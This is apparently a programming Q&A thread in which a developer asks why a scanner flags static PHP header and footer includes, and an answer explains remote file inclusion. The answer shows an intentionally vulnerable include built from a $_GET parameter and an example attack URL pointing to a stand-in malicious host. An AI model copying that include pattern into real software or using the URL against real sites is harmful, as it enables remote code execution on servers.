# How come a simple PHP include file be vulnerable

Tags: php, security, include, whitelist

I have a header.php and a footer.php which I include into all other pages like home, contact, about us etc.

The way I included the header and the footer file is

```
<?php include 'inc/header.php';
some code
some code
include 'inc/header.php'; ?>
```

Everything simple and works fine.

I decided to check my project for vulnerability and downloaded RIPS scanner. After the scan, the result

```
Userinput reaches sensitive sink.

5: include include 'inc/header.php';  // header.php
requires:
     5: if(!in_array($_GET['file'], $files)) else
```

which basically say that both header and footer are vulnerable and I should use

```
if(!in_array($_GET['file'], $files)) else
```

How come a simple include header and footer file be vulnerable? and if vulnerable, how should i implement if(!in_array($_GET['file'], $files)) else ??

**header.php**

```
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
    <title></title>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <link rel="icon" href="images/common/lbfavicon.ico" />
    <meta name="author" content="example.com" />
    <link rel="stylesheet" type="text/css" href="template/css/reset.css" media="screen" />
    <link rel="stylesheet" type="text/css" href="template/css/layout.css" media="screen"/>
</head>

<body>
    <div id="header-wrapper">
        <div class="container">
            <div id="nav">
                <ul>
                    <li><a href="./">Home</a></li>
                    <li><a href="index.php?page=about">About</a></li>
                    <li><a href="index.php?page=contact">Contact</a></li>
                </ul>
            </div><!-- nav ends -->
        </div><!-- container ends -->
    </div><!-- header wrapper ends -->

    <div id="header">
        <div class="container">
            <div id="logo">
                <a href="./"><img src="template/images/logo.png" width="125" height="45" alt="logo" /></a>
            </div><!-- logo ends -->
            <div id="search">
                <form method="get" action="searchresult.php">
                    <div class="form-item">
                       Search: <input  type="text" maxlength="120" name="searchfor" />
                    </div>
                </form>
            </div><!-- search ends -->
        </div><!-- container ends-->
    </div><!-- header ends -->

    <div class="container">
        <div id="announcement">
            <div id="breadcrumbs"></div>
        </div><!-- announcement ends -->
        <div id="pagewrapper">
```

**Footer.php**

```
        <div id="bottom">
            <div class="column">
                <h2>Abc.com</h2>
                    <ul>
                        <li><a href="about">About</a></li>
                        <li><a href="contact">Contact</a></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Mode of payment</h2>
                    <ul>
                        <li>Credit/Debit card | Cheque | Demand draft</li>
                    </ul>
                <h2>Get in touch</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div class="column">
                <h2>Call us / Mail us</h2>
                    <ul>
                        <li>0-9999384745 / <a href="mailto:info@example.com">info@example.com</a></li>
                    </ul>
                <h2>Share us</h2>
                    <ul>
                        <li><img src="template/images/facebook.png" width="32" height="32" alt="facebook" /></li>
                    </ul>
            </div>

            <div style="clear: both;"></div>
        </div> <!-- bottom ends -->

        <div id="footer">

        </div>

        </div> <!--Pagewrapper end-->
    </div>    
</body>
</html>
```

Comment: We need more context on the code contained in your include, particularly regarding that statement you posted. Can you edit your post to include more information?

Comment: This question needs more code it looks like you have some maybe "vulnerable" code on line file in header on line 5, thought.

Comment: 'Userinput reaches sensitive sink' if you are not getting filenames from a user's input then this warning is a non-sense.

Comment: @MariM, sure give me a few minutes.

Comment: @VeeeneX, line 5 is, include 'inc/header.php';

Comment: @Answers_Seeker, hmm, you sure mate?

Comment: Is there even any user input going on in these? I see nothing wrong. The includes are just HTML.

Comment: @MariM, absolutely no user input, just a simple inclusion of header and footer.

Comment: Can you post the file that includes the header and footer? That one that's triggering the warning with line 5.

Comment: @MariM, I tried the whole thing in a new index.php file containing nothing but include'inc/header.php' and include'inc/footer.php'. Get the same warning. The original index file has a few constants and a template parser.

Answer (score 5, accepted):

Well I suppose this is just a warning but in a global way, when you include .php scripts which names come from user input, you should absolutely check if the names provided are correct or not (to prevent security issues).

For example, a lot of websites use a "global" file that would include file according to requests coming from the user.

Example :

```
<?php

$get = $_GET['action'];
if ($get == "index") {
   include "includes/index.php";
}
//...
else
{
   include $get .".php";
}
```

Now let's imagine someone want to include some malicious script within your website. If your server allow cross-website requests, then people could specify some external script that could be dangerous for your server or the others users.

Example : ./global.php?action=http://malicious4ever.com/dirtything

Comment: There's a name for this, it's called File Inclusion Vulnerability.

Comment: Thank you, didn't know there was a specific name :)

Comment: @Cr3aHal0, yeah its RFI, remote file inclusion. But what is wrong with a simple inclusion of a header and footer.

Comment: As I said, it can be a warning, have a look at @Answers_Seeker answer above